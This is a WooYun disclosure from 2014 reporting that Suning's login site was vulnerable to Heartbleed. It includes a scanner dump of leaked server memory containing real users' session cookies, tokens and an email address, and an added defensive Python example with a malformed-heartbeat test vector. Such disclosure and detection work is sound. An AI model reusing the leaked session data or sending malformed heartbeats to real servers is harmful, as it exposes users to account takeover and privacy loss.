
Vulnerability summary

Defect ID: wooyun-2014-055950

Title: Improper operations on the Suning.com main site allow sensitive server information to be obtained

Vendor: Jiangsu Suning E-Commerce Co., Ltd. (江苏苏宁易购电子商务有限公司)

Author: MeirLin

Submitted: 2014-04-08 17:54

Fixed: 2014-05-23 17:55

Published: 2014-05-23 17:55

Vulnerability type: Improper system/service operations configuration

Severity: High

Self-assessed Rank: 18

Status: Confirmed by vendor

Source: http://www.wooyun.org. For questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2014-04-08: Details sent to the vendor, awaiting vendor handling
2014-04-09: Vendor confirmed; details disclosed to the vendor only
2014-04-19: Details disclosed to core white hats and relevant domain experts
2014-04-29: Details disclosed to regular white hats
2014-05-09: Details disclosed to intern white hats
2014-05-23: Details disclosed to the public

Summary:

Improper operations on the Suning.com main site make it possible to log in as arbitrary users and to obtain sensitive server information.

Detailed description:

https://passport.suning.com


(Image: 1.png)


Connecting...
Sending Client Hello...
Waiting for Server Hello...
... received message: type = 22, ver = 0302, length = 58
... received message: type = 22, ver = 0302, length = 3559
... received message: type = 22, ver = 0302, length = 4
Sending heartbeat request...
... received message: type = 24, ver = 0302, length = 16384
Received heartbeat response:
.@....SC[...r....+..H...9........w.3....f.....".!.9.8.........5.
............................3.2.....E.D...../...A...............
..................I...........4.2...............................
....................#.......31 (KHTML, like Gecko));dv(ZP900S Bu
ild/IMM76D);pr(UCBrowser/9.3.0.321);ov(Android 4.0.4);pi(540*960
);ss(540*960);up(U3/0.8.0);er(U);bt(UM);pm(1);bv(1);nm(0);im(0);
sr(0);nt(1);..Referer: https://m.suning.com/emall/SNMWLogonView?
catalogId=10051&storeId=10052&krypto=jH%2BX7iif8nPNG7HOz2SMdJVSD
hxbo7s2BHmi3q0tE2x61VDNMf05R%2BxZlUW9orIhD7h%2F%2BzVGOV5a%0Ap6B9
Oum0psvB3jQ6jFoOihj5p15IfGcSRafMfcisA09gvSpkbUK4LgdQXrFwRbKzgPp8
xl0S0y1C%0AJHkOLl7%2FYQo2BNW2UjhOrWWUeuGuYM74jazmYQE%2BlBaamCJV2
vC67gkPLSkQ0WYa1uOEqHKE3mpk%0AHnHst9dbcLWfe06OEInJoHNpDeV1lRB772
d9pC02KvEV9550T6O%2FKjM7%2B4HV%2BTlJZOP%2BjbAHr6Jh%0AS%2ByeAhNU%
2BKKyeShSYwaERB5MqkoCIHrnsaOSd78owxqsUpWEsXzK5982IkCvrC3zFre2TGR
LSZHb%0ApAxpdb%2Bogio15cNE3SxbzFsCQNf3mi34SUEn%2BG0O7OdoBUShBxrx
dzme5pf%2BgoSSiLgcTtuqBcbA%0AlFxiGHubpcL%2BzCngI8dCUGMLFgOFfJUT%
2BYpHgdTY8a62BdOy4HwiQAV3tNI4H6G42uQ%3D&ddkey=https:Logon..Accep
t-Encoding: gzip..User-Agent: Mozilla/5.0 (Linux; U; Android 4.0
.4; zh-CN; ZP900S Build/IMM76D) AppleWebKit/534.31 (KHTML, like
Gecko) UCBrowser/9.3.0.321 U3/0.8.0 Mobile Safari/534.31..isAjax
Request: 1..Accept: application/json, text/javascript, */*; q=0.
01..Connection: keep-alive.......~.AHC-..,....ning.com/emall/SNM
WLogonView%3FcatalogId%3D10051%26storeId%3D10052%26krypto%3DjH%2
52BX7iif8nPNG7HOz2SMdJVSDhxbo7s2BHmi3q0tE2x61VDNMf05R%252BxZlUW9
orIhD7h%252F%252BzVGOV5a%250Ap6B9Oum0psvB3jQ6jFoOihj5p15IfGcSRaf
MfcisA09gvSpkbUK4LgdQXrFwRbKzgPp8xl0S0y1C%250AJHkOLl7%252FYQo2BN
W2UjhOrWWUeuGuYM74jazmYQE%252BlBaamCJV2vC67gkPLSkQ0WYa1uOEqHKE3m
pk%250AHnHst9dbcLWfe06OEInJoHNpDeV1lRB772d9pC02KvEV9550T6O%252FK
jM7%252B4HV%252BTlJZOP%252BjbAHr6Jh%250AS%252ByeAhNU%252BKKyeShS
YwaERB5MqkoCIHrnsaOSd78owxqsUpWEsXzK5982IkCvrC3zFre2TGRLSZHb%250
ApAxpdb%252Bogio15cNE3SxbzFsCQNf3mi34SUEnLLGK97g%252BKGYpqrD2QkR
bSaYosuUiD%252FYvwmMJiWRC%250A7gGZ7GqLr9KVOV7wMMGx51tIEIovTOObvp
V^m..+.'..F....*2C822%29%28233%2C973%29%28undefined%2Cundefined%
29%280%2C0%29%28undefined%2Cundefined%29%280%2C0%29%28undefined%
2Cundefined%29%280%2C0%29%28286%2C1016%29%28622%2C846%29; WC_USE
RACTIVITY_42167480840=42167480840%2c10052%2c0%2cnull%2c139695011
3713%2c1396957929635%2cnull%2cnull%2cnull%2cnull%2cRwQIfr6JwV58J
U6yvO9k5VLVYXVEuc%2bDmq5Fjc6K3VNMTn4%2fRjISR3kC%2bfnhC6kvBMLxv2L
dyZMc%0a4AR5IZgNeu%2b772rZlI%2f8sS4aCIiRurJTKJO761Zh63w9aqmp%2fM
AkX7Hc%2b2SrdlEjnlrR2wkdwhEg%0a6hgeXCHr5DT6qcVCBIKY8yw2cb09jQ%3d
%3d.....gh..:...W...1m..jj......est=a; abtestN=c; firstAccess=ye
s; smhst=4352764a16812901a3965144a18803215a16812905; _snma=1%7C1
38958281362275702%7C1389582813622%7C1396940751976%7C139694077367
1%7C548%7C173; _snmp=139694075285671452; _snmb=13969400395312338
4%7C1396940773687%7C1396940773680%7C16; __utma=1.1600380945.1389
582814.1396927805.1396940040.150; __utmc=1; __utmz=1.1396940040.
150.93.utmcsr=product.suning.com|utmccn=(referral)|utmcmd=referr
al|utmcct=/snupgbpv_10052_10051_18802726_113110_.html; __utmv=1.
buyer; _snmz=139694077851029170%7C%28505%2C1127%29; idsLoginUser
IdLastTime=10823559%40qq.com; theme=default.......D5.....v!..>Nr
sZtgqrHGojMLb2gOJuZwZRz8A%3d%3d...../..*.....EG.b...............
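The scanner transcript above is a TLS heartbeat response of 16384 bytes echoing back memory that holds other users' session cookies and request headers, which is the behaviour associated with the OpenSSL Heartbleed defect. The following Python is an added example written for this page, not code from the reporter or from Suning; it parses the scanner's `received message` lines, flags heartbeat records that are implausibly large (the 64-byte threshold is an assumption for the example), and shows the RFC 6520 bounds check that a correct implementation applies before echoing a heartbeat payload. The sample log lines are copied from the report; the two heartbeat records are constructed test vectors.

```python
"""
Added example (not from the report): parse a Heartbleed scanner log,
flag oversized heartbeat responses, and validate HeartbeatMessage
bodies the way RFC 6520 requires.
"""
import re
import struct

# TLS record content types (RFC 5246) and heartbeat message types (RFC 6520)
CT_HANDSHAKE = 22
CT_HEARTBEAT = 24
HB_REQUEST = 1
HB_RESPONSE = 2
HB_MIN_PADDING = 16          # RFC 6520: padding MUST be at least 16 bytes

# Constructed sample: the scanner lines quoted in the report above.
SAMPLE_LOG = [
    "... received message: type = 22, ver = 0302, length = 58",
    "... received message: type = 22, ver = 0302, length = 3559",
    "... received message: type = 22, ver = 0302, length = 4",
    "Sending heartbeat request...",
    "... received message: type = 24, ver = 0302, length = 16384",
]

LOG_RE = re.compile(r"type = (\d+), ver = ([0-9a-fA-F]{4}), length = (\d+)")


def parse_tool_log(lines):
    """Return (content_type, version, record_length) for each record line."""
    records = []
    for line in lines:
        m = LOG_RE.search(line)
        if m:
            records.append((int(m.group(1)), m.group(2), int(m.group(3))))
    return records


def oversized_heartbeat_responses(records, threshold=64):
    """Detection rule: heartbeat records far larger than a sane echo.
    The 64-byte threshold is an assumption for this example."""
    return [r for r in records if r[0] == CT_HEARTBEAT and r[2] > threshold]


def parse_record(buf):
    """Split one TLS record (5-byte header + body) into its parts."""
    if len(buf) < 5:
        raise ValueError("short TLS record header")
    ctype, ver, length = struct.unpack("!BHH", buf[:5])
    body = buf[5:5 + length]
    if len(body) != length:
        raise ValueError("record body truncated")
    return ctype, ver, body


def heartbeat_payload_checked(body):
    """Bounds-checked parse of a HeartbeatMessage body.
    Returns the payload, or None when the message must be discarded
    because payload_length cannot fit inside the record (the check
    whose absence produced the 16384-byte response in the log)."""
    if len(body) < 3:
        return None
    hb_type, payload_len = struct.unpack("!BH", body[:3])
    if hb_type not in (HB_REQUEST, HB_RESPONSE):
        return None
    if 1 + 2 + payload_len + HB_MIN_PADDING > len(body):
        return None
    return body[3:3 + payload_len]


def unchecked_echo_overread(body):
    """Bytes beyond the record that an unchecked echo would copy from
    process memory; 0 means the message is well formed."""
    if len(body) < 3:
        return 0
    _, payload_len = struct.unpack("!BH", body[:3])
    return max(0, payload_len - (len(body) - 3))


def build_test_record(hb_type, claimed_len, payload, padding=b"\x00" * 16):
    """Constructed test vector for the validator: a heartbeat record whose
    payload_length field may disagree with the bytes actually present."""
    body = struct.pack("!BH", hb_type, claimed_len) + payload + padding
    return struct.pack("!BHH", CT_HEARTBEAT, 0x0302, len(body)) + body


if __name__ == "__main__":
    for rec in oversized_heartbeat_responses(parse_tool_log(SAMPLE_LOG)):
        print("suspicious heartbeat record:", rec)
    good = parse_record(build_test_record(HB_REQUEST, 4, b"ping"))[2]
    bad = parse_record(build_test_record(HB_REQUEST, 16384, b"x"))[2]
    print("well-formed ->", heartbeat_payload_checked(good), unchecked_echo_overread(good))
    print("malformed   ->", heartbeat_payload_checked(bad), unchecked_echo_overread(bad))
```

The log-side rule is the same idea network IDS signatures used at the time: a heartbeat record (content type 24) whose length is far above what a legitimate keep-alive needs is worth alerting on. The record-side check is what the upgraded OpenSSL applies, which is why "upgrade" is the complete fix for this finding.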

Proof of vulnerability:

(Image: 1.png)

Fix recommendation:

Upgrade

Copyright notice: please credit the source when reposting: MeirLin@WooYun


Vulnerability response

Vendor response:

Severity: Low

Vulnerability Rank: 3

Confirmed: 2014-04-09 09:17

Vendor reply:

Confirmed

Latest status:

None yet


Vulnerability feedback:

Comments

  1. 2014-04-09 10:03 | MeirLin (Intern white hat | Rank:96 Vulnerabilities:30 | account lent out)

    @Jiangsu Suning E-Commerce Co., Ltd. It passed review twice, and then the already-confirmed hole seems to have been deleted by an admin by mistake QAQ